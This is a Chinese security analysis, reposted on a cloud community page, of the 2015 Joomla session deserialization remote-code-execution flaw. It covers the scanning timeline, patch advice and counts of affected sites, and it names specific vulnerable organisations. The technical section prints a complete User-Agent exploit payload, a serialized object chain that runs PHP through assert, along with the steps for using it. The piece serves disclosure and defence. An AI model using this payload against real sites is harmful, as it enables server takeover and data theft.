专栏首页FreeBufJoomla高危漏洞扫描事件分析

Joomla高危漏洞扫描事件分析

1.摘要

12月14日,Joomla官方网站紧急发布了一条由于安全漏洞引发的版本更新(3.4.6),根据安全公司sucuri对外发布的信息,此事扫描时间是利用了Joomla的反序列化特性的问题导致命令执行的高危漏洞。从中国时间12月13日凌晨开始,有3个IP针对全球的网站进行了大规模的扫描。根据白帽汇安全团队的分析,此次扫描有两个特性:一是针对中国的网站扫描的较少,大批量针对国外的网站进行的;二是扫描并没有触发实质性的破坏工作。

虽然此次扫描并没有进行实质性的破坏,但是漏洞本身是高危害性的,成功攻击的情况下会导致敏感数据丢失,服务器被控制,甚至是服务中断。建议使用了Joomla的网站尽快到官方网站进行补丁更新,在最新版本3.4.6之前的所有版本都受影响。

通过对全球60万家采用Joomla的网站进行进一步分析,截至12月15日23点30分,此次漏洞影响至少超过49000家网站,绝大部分集中在国外(美国排名第一),国内目前监控到超过600家网站存在漏洞,我们会在后续持续更新进一步动态。

2.事件回溯

12月13日,由IP 74.3.170.33 发起的小规模漏洞扫描; 12月14日到15日,由IP 146.0.72.83 和194.28.174.106发起的更大规模的全网扫描。 12月15日,安全公司sucuri的官方博客对外发布消息,表示在中国时间12月13日陆续截获到了来自3个IP的大规模扫描事件。 12月15日,joomla官方发布最新版本3.4.6修复该漏洞。 12月15日,国内各安全相关团队对互联网进行了激烈的比拼扫描,为国内互联网流量增长持续贡献价值。

经过技术分析,此次漏洞利用需要在一个session会话内进行两次发包,而实际上我们通过大量的安全日志分析只看到了第一次POC的发送,并没有看到第二次利用的过程,这是我们比较不理解的。所以我们也并没有看到实质性的破坏工作,这也是不幸中的万幸。

3.技术还原

通过Diff最新的补丁发现官方在补丁中删除了User-Agent的获取:

这个漏洞存在于反序列化session的过程中,在libraries/joomla/session/session.php 文件中,_validate函数通过set把User-Agent数据存入进数据库:

Joomla并没有采用php自带的session处理机制,而是用自己编写了存储session的容器(storage),其存储格式为『键名 + 竖线 + 经过 serialize() 函数反序列处理的值』,这里并没有正确处理多个竖线的情况。所以,攻击者就可以通过注入一个"|"符号,将它前面的部分全部认为是name,而|后面我就可以插入任意serialize字符串,进行触发反序列化漏洞了。

我们可以构造一个exp插入User-Agent:

User-Agent: }__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:37:”phpinfo();JFactory::getConfig();exit;";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"connection";b:1;}ð

进行访问站点,把恶意的User-Agent插入数据库,然后再此访问站点成功利用(注意cookie保证一致)

更多技术细节可以查看原文。

4.影响危害

易攻击对象:

采用Joomla系统 版本低于3.4.6(也就是12月15日之前的所有版本)

5.修补加固建议

此次事件利用的漏洞影响范围非常广泛,所以请所有采用Joomla的网站尽快升级至3.4.6版本或安装官方补丁。

注:下载补丁直接替换\libraries\joomla\session\session.php文件。

另外,可以通过加入一些安全云防护类产品来进行保护,比如360网站卫士,百度云加速,知道创宇加速乐等等,他们在漏洞发生后的第一时间内都增加了防护规则。

6.常见问题FAQ

Joomla是什么?

Joomla是一套在国外相当知名的内容管理系统(简称CMS),使用PHP语言和MySQL数据库开发,可以在Linux、 Windows、MacOSX等各种不同的平台上执行。在国内实际应用的场景不算太多。

这次扫描事件有什么危害?

成功的入侵能够导致敏感数据丢失,服务器被完全控制,甚至是服务中断。

影响范围有多大?

全球大约有60万采用Joomla进行建站的网站,中国互联网大约有11000家网站。通过白帽汇安全团队的监控,至少有49000家网站受影响,主要集中在美国,国内实际影响的网站数超过627家。

到哪下载补丁?

3.x和2.x版本地址下载,请阅读原文

我应该怎么做?

参考修复建议,直接更新版本或者补丁。

如果发现了入侵痕迹,还要将已经入侵成功的后门进行清除。

7.影响的部分网站

此次漏洞影响的网站主要集中在国外,全球漏洞排名前十的国家是:

11781 美国 6522 德国 3622 波兰 3474 荷兰 2427 俄罗斯 2423 法国 1751 英国 1392 意大利 1232 澳大利亚 1049 加拿大

国内影响的部分知名网站:

国家林业局 OPPO手机 中央广播电视大学 华东政法大学 中国香港中文大学 GLP集团 中山大学 东莞电子科技大学 红豆集团 富国集团 陕西师范大学 商丘廉政网 世界O2O博览会 博雅方略咨询(集团) 石家庄铁道大学 葵花游戏 凉山矿业股份有限公司 四姑娘山官方网站。

国外影响的部分知名网站:

哈佛大学 麻省理工大学 剑桥大学 Intel IEEE Honda 牛津大学 东京大学 加州州议会大厦博物馆 Utah尤他政府网 南佛罗里达大学 Amtrak警察局 CashStar。

对应的世界地图为:

8.参考

https://blog.sucuri.net/2015/12/remote-command-execution-vulnerability-in-joomla.html

https://github.com/80vul/phpcodz/blob/master/research/pch-013.md

https://github.com/rapid7/metasploit-framework/issues/6347

http://php.net/session_set_save_handler

http://php.net/manual/zh/session.configuration.php#ini.session.serialize-handler

https://github.com/joomla/joomla-cms/compare/3.4.5...3.4.6?diff=split&name=3.4.6

http://drops.wooyun.org/papers/11330

*本文作者:白帽汇(企业账号),转载请注明来自FreeBuf黑客与极客(FreeBuf.COM)

本文分享自微信公众号 - FreeBuf(freebuf),作者:白帽汇

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2015-12-18

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • Chrome和Edge远程代码执行0Day漏洞曝光

    北京时间4月13日凌晨,安全研究人员Rajvardhan Agarwal在推特上发布了一个可远程代码执行(RCE)的0Day漏洞,该漏洞可在当前版本的谷歌Chr...

    FB客服
  • CVE-2020-27897:APPLE MACOS内核OOB写入权限提升漏洞

    就在前几天,Zero Day Initiative曾发布过六份关于苹果macOS中安全漏洞的公告,其中有一条公告涵盖了一个由 ABC Research s.r....

    FB客服
  • Squirrelmail远程代码执行漏洞(CVE-2017-7692)复现+修复方案

    一、实验环境 操作机:kali2.0 目标机:Centos 6.0 Squirrelmail版本:1.4.22-4el6 二、漏洞原理 1、有一个可以登录的邮...

    FB客服
  • 【AI 引擎】前谷歌VP:机器实现情感智能化 | 微软发布Speaker Recognition | 五角大楼在AI武器上大投资

    1.前谷歌副总裁:机器能在2016年实现情感上的智能化 ? Andrew Moore —卡内基梅隆大学计算机科学院院长,同时也是谷歌的前副总裁。他预测2016年...

    新智元
  • 开源PaaS云Foundry Foundation粉墨登场

    Cloud Foundry,一个开放源代码的PaaS云,已经不是什么新鲜事物了。它已经存在好几年了。新鲜的地方在于:Cloud Foundry Foundati...

    静一
  • 从YARN迁移到k8s,滴滴机器学习平台二次开发是这样做的

    2019 AI开发者大会是由中国IT社区 CSDN 主办的 AI 技术与产业年度盛会,2019 年 9 月 6-7 日,近百位中美顶尖 AI 专家、知名企业代表...

    AI科技大本营
  • java高并发系列 - 第19天:JUC中的Executor框架详解1

    Executors框架是Doug Lea的神作,通过这个框架,可以很容易的使用线程池高效地处理并行任务。

    路人甲Java
  • [资源分享] TensorFlow 官方中文版教程来了

    最近,TensorFlow 提供了中文版的教程(Tutorials)和指南(Guide)。

    kbsc13
  • 什么是SAP Graph

    今年九月份刚刚过去的SAP TechEd Las Vegas会议上,SAP CTO Juergen Mueller向外界宣布了SAP一些持续进行的技术创新和改进...

    Jerry Wang
  • [案例] 批量EDI:每天处理30,000次EDI交易

    自1999年以来,B2BGateway已经为成千上万的客户提供了完全托管的EDI和API连接解决方案,使企业能够连接到全球主要零售商、第三方物流服务和许多其他合...

    EDI顾问-杨欢

扫码关注云+社区

领取腾讯云代金券